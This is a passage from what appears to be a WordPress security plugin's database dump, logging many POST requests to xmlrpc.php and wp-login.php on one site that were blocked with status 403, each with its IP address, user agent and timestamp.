Safari\\/537.36\"}','K29ZlsgDBwyzG1xfcbO4SPXT',0,1665313189.9389,1182,'','POST',403,0,600,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AGTzFY7dy82rwLjRcP3fnSvk',0,1665313097.5299,1572,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zc8L47kbsm6KSDtTWVpJM2OY',0,1665312699.8748,568,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gICW87NpUvFOyKZea2dxP149',0,1665312679.9474,1259,'','POST',403,0,515,0,1,'',0),('31.172.80.147',531386515,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nbtDYLaRrhyAFKXv2s9WSoTC',0,1665312329.9404,500,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L5x09Eb1DBtcvQS4so8TCk2w',0,1665312301.5716,18907,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NVmKr94zEc2SCZIGtDnwlavs',0,1665311892.8074,1737,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GzAy3NV4hcs9UiPIbR0KH1EX',0,1665311534.7581,2602,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','mELqfKAg4ld1ZiIvtoFJ9ku5',0,1665311175.9027,1372,'','POST',403,0,600,0,1,'',0),('120.24.52.65',2014852161,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aVdiJxUT3eynoEWDj9hCkQbm',0,1665311130.9083,5000,'','POST',403,0,515,0,1,'',0),('38.242.221.235',653450731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wpxdf5VXacjyLHz2In6mtqe1',0,1665311133.2486,1760,'','POST',403,0,515,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HgDScLyOm1odU0hENiQkjCeG',0,1665310743.6413,19099,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yxNv2dzaute8i4L3cYojrhT7',0,1665310753.0961,9644,'','POST',403,0,515,0,1,'',0),('47.104.66.61',795361853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sjIB1YEG2JAlpaQfHrq0tNUO',0,1665310392.4679,2405,'','POST',403,0,515,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qLTQSJc4PA63K1bYyHXZi9pI',0,1665309981.6456,604,'','POST',403,0,515,0,1,'',0),('51.178.136.33',867338273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u0iDKcHZyMBgdTShE1QAkstU',0,1665309957.8582,19004,'','POST',403,0,515,0,1,'',0),('13.126.36.87',226370647,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rzg5lMEDR73yJKNnvLTUYwj4',0,1665316526.9538,476,'','POST',403,0,600,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZU3ltKLT70kO2mFMH5engId4',0,1665316139.4573,18877,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zd3srV7SbELkl2vWtyN0h58U',0,1665315756.1174,498,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','vAQE68D7Htqg9F2ZaoP1IjbS',0,1665315221.2247,15201,'','POST',403,0,600,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EknGgr9hRoU1NYKjTtAB7IPv',0,1665315079.2890,3160,'','POST',403,0,515,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yicp57RatqGWX4CgEx8QnF9w',0,1665315095.6521,800,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zcWBGJQEsUNy2MbrKkRPDxTS',0,1665314709.1406,16565,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MJFpveKhP8yR2qg4NuB9sGfx',0,1665314676.9824,1265,'','POST',403,0,515,0,1,'',0),('3.34.104.242',52586738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y5skzJNugDZxTSrwPavF8oKE',0,1665314273.4921,14830,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','09IXxOVHrQdUMSj4Z12szbmA',0,1665314270.1183,18106,'','POST',403,0,515,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pgutcbZm47h3RN8HlnvxfsJE',0,1665313888.9243,11467,'','POST',403,0,515,0,1,'',0),('13.126.36.87',226370647,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4B0lTgNerIX3jvPiMoGVSD7L',0,1665313904.1960,482,'','POST',403,0,515,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Di76JmwNgZjs8vLRXdunF5Q3',0,1665313513.6709,654,'','POST',403,0,515,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fgBvDzCUPpE9iM5qSJu3x6VQ',0,1665320499.0293,1860,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GKiuzs43jF0oeRaJMBf7XYcU',0,1665320499.7937,939,'','POST',403,0,515,0,1,'',0),('192.145.126.115',3230760563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lKQJHDwgf8qB5n7xrd9VStiO',0,1665320304.3373,4130,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ok6dwCtxioRgJz5UqZ1BIjD7',0,1665319662.4823,18311,'','POST',403,0,515,0,1,'',0),('192.169.177.64',3232346432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CRBpU7Jy5Eszc4mKqe8QVDft',0,1665319232.0292,18445,'','POST',403,0,515,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','ktwJLhfdc8WauETZzrVmoRxp',0,1665319295.0268,6688,'','POST',403,0,600,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rugdWXTa3QpbCc5UtP0BZhFs',0,1665318690.2951,26419,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xXv5wNb63zVqmC8OUcnhTMpR',0,1665318689.0623,27628,'','POST',403,0,515,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','C0dnaE1Zb2l8hPKvNFYzRLBo',0,1665317261.6676,19249,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','1ZYeuT2Ek3HGR7Jvp80OAQ9C',0,1665325466.5733,18690,'','POST',403,0,600,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','R1fpZmXN4vwqlzsWD5u0kTGE',0,1665323405.3448,1458,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oXyaRqHZMJUY8gIwsEmGFiKn',0,1665323842.3700,1559,'','POST',403,0,515,0,1,'',0),('51.178.136.33',867338273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rhRILls63cBSQTF7k0KGfEYn',0,1665323371.7363,489,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4x5rWEkdCGbwaZiIcBYSLFQ9',0,1665323346.8817,19746,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0yDAudJgHfWsn6EpaR8iLQoO',0,1665322310.8837,1143,'','POST',403,0,600,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M5gzQUxl1oOyVpjbk9ri07C2',0,1665322310.6189,1266,'','POST',403,0,600,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EbGY3el5oQywaTU6k12vJFVL',0,1665321469.1057,453,'','POST',403,0,600,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8kZbiYHWzlQusD3XCpLR579B',0,1665321435.7035,455,'','POST',403,0,600,0,1,'',0),('13.79.17.158',223285662,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','szwVFQDiGfAEBMYJhOuo8CU2',0,1665321358.4723,17994,'','POST',403,0,600,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wzf3cUAW0gyqTs4ejH7hNlJb',0,1665327764.9383,2489,'','POST',403,0,515,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jenkd9873PiVwv06AyfSpLNl',0,1665327748.7956,18631,'','POST',403,0,515,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','Oj9IGbqMuNveDYAcxTSyVw5W',0,1665327542.8493,1532,'','POST',403,0,600,0,1,'',0),('95.173.161.171',1605214635,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dWfuiO2GzZkJVX5smYHKp69L',0,1665327286.1463,1366,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KQP2IT8qCJMowkSFiE5vR4e7',0,1665327283.3059,2696,'','POST',403,0,515,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','avfGIEXsu76MH0VktBhgxSdi',0,1665326823.6323,11736,'','POST',403,0,515,0,1,'',0),('198.98.50.19',3328324115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/42.0.2311.90 Safari\\/537.36\",\"2\":\"http:\\/\\/www.google.com.hk\"}','k5DCtnf7PjLOuBhgFNc1XHb8',0,1665326887.2218,1362,'','POST',403,0,515,0,1,'',0),('159.223.186.76',2682239564,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Qf0dxGtz7gjOAprXhCTsVe6w',0,1665326376.1737,560,'','POST',403,0,515,0,1,'',0),('35.213.170.208',601205456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tZepkonSEaYhD7dc82IBWLbU',0,1665326341.1501,1603,'','POST',403,0,515,0,1,'',0),('13.126.36.87',226370647,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sPynZFzvhNa4uircq213OxMY',0,1665325911.6073,13815,'','POST',403,0,515,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tahzr8oBvCMg3WHZY9nKVF1j',0,1665325922.8451,2569,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','35mKNk8jEiewDqJUMY1sBGQR',0,1665331055.1452,17235,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7ZFtHuUP3vxGDkhMV9NlmXdp',0,1665330551.4785,18744,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','naW7D9p0FKRAwtz83L5QYqP4',0,1665330566.9261,3296,'','POST',403,0,515,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','BeW8g7TpLzojrk4DGXPKvJx6',0,1665330159.0635,1437,'','POST',403,0,600,0,1,'',0),('143.198.161.19',2412159251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pTEBlZu6arC9iFQNLwd7hosS',0,1665330072.1057,18587,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JkuUe5qpE17fBvP6zb2tYQMG',0,1665329637.2863,1489,'','POST',403,0,515,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W8eU9ogRiELp0JKaxA1mDhl3',0,1665329611.9477,18438,'','POST',403,0,515,0,1,'',0),('148.72.244.53',2487809077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Sl1kNPiRzMUWZ6FsbQ2vHVEK',0,1665329128.5144,20962,'','POST',403,0,515,0,1,'',0),('187.32.188.214',3139484886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NFo7jhVgfv1w3qTZAXyCcEbx',0,1665328683.8713,18662,'','POST',403,0,515,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WH3GJCsq2PRSvrykbwgjN9ZY',0,1665328242.9797,489,'','POST',403,0,515,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZcxyCLE1dgmWTKv3orjDwSQ2',0,1665328213.5886,18245,'','POST',403,0,515,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','nkqEDBurl9VRdNaFmtb8H04A',0,1665334773.6798,1336,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','pXU4i16G0Dsh7dIYuwTgWbJE',0,1665334333.7110,470,'','POST',403,0,600,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','9c4z8KXZQEawYJvNnFfjMxmq',0,1665333735.8952,17606,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','5UpG2uDOTQsL7zdqSgRk9ZIW',0,1665332699.9642,17450,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','IalEYxL3wB569ikrbfqptPe0',0,1665332259.1498,18058,'','POST',403,0,600,0,1,'',0),('115.79.139.135',1934592903,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','ms3VNWwiAzUk80Tj95O6ZuGp',0,1665331652.9221,552,'','POST',403,0,600,0,1,'',0),('2.184.67.138',45630346,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zLJ2PSGDgVWHeQ3BEXmCKT1M',0,1665331547.0130,1329,'','POST',403,0,515,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1bYKxVCjcWFykSfJ96O3l7Bv',0,1665331518.6838,18283,'','POST',403,0,515,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','ze4ZBS6GFh8iTA2xMwYOJ10D',0,1665331206.6015,17830,'','POST',403,0,600,0,1,'',0),('192.30.89.51',3223214387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','P2uT1e4bgGLJykivNndzVB6o',0,1665338387.2453,10311,'','POST',403,0,515,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','SzDodvt1l7uAVTQcnhHJj9bB',0,1665337881.2730,1541,'','POST',403,0,600,0,1,'',0),('142.93.203.156',2388511644,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','CVoIRXxFuB9gtMbSYQ3ZJer4',0,1665337444.2803,1798,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','iTFwJOI9Kh7vEW8ZRfCtuHbd',0,1665336852.1128,5982,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','A91vahfCjrNtFTbQzegkLBs8',0,1665336415.9223,10043,'','POST',403,0,600,0,1,'',0),('207.188.157.79',3485244751,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','b6PGAq5zmhVXEBuJZ7Friec3',0,1665335814.9067,17836,'','POST',403,0,600,0,1,'',0),('173.236.184.116',2917972084,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','kD4wOIZyWzHpJerE3mPtNqVT',0,1665335373.0113,1311,'','POST',403,0,600,0,1,'',0),('184.75.221.163',3091979683,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Y2khsNWrbUuxOdC0LvGT81EP',0,1665334929.0424,18095,'','POST',403,0,515,0,1,'',0),('198.46.81.19',3324924179,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','R4phmvTVw9cxSuIUzn5MANP2',0,1665342520.1520,19757,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Be5FOSlH7wa3MyJmptGoXx6R',0,1665341953.0343,17936,'','POST',403,0,600,0,1,'',0),('54.36.182.160',908375712,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','edF49xXaRAbn3lWzDimqJkYG',0,1665341535.8085,17461,'','POST',403,0,600,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 